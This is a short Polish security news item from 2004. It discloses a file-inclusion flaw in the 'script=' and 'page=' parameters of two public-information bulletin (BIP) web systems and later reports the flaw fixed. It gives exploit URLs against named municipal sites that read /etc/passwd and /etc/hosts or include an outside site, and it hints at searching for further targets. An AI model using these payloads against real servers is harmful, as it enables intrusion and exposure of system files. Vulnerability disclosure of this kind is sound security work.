Systemy BIP z błędami
W ostatniej wersji systemu BIP służącego do publikacji i obsługi Biuletynu Informacji Publicznej dla jednostek administracji publicznej występuje błąd, który pozwala na wyświetlenie bądź podglądnięcie większości plików znajdujących się na serwerze.
Problem dotyczy błędnego wczytania informacji, jakie przekazywane są przez zmienną „script=” w systemie BIP/G firmy Maxus oraz przez zmienną „page=” w systemie BIP firmy Softres. Zmienne te wykonują kod z określonego pliku w trakcie wykonywania skryptu.
A zatem wystarczy, że w zmiennej „script=” bądź „page=” (w zależności od systemu BIP) wpiszemy np. /etc/passwd co spowoduje, że na stronie wyświetli się zawartość tego pliku bądź, jak to bywa w takich przypadkach, można bardzo łatwo wyświetlenia inną stronę www.
Dla przykładu korzystając z systemu BIP firmy Softres można wywołać dowolny plik bądź adres www w następujący sposób:
http://www.medyka.itl.pl/bip/index2.php?page=/etc/passwd
http://www.hyzne.itl.pl/bip/index2.php?page=/etc/hosts
http://www.powiat-lancut.itl.pl/bip/index2.php?page=http://hacking.pl
Lista BIP podatnych na wyżej wymieniony błąd dostępna jest tutaj, natomiast osoby zainteresowane wersją BIP/G mogą skorzystać z dobrodziejstwa, jakim jest wyszukiwarka Google i tam poszukać serwerów działających z systemem BIP.
Aktualizacja: (2004-04-16 17:08): Opisywany błąd w systemie BIP został poprawiony.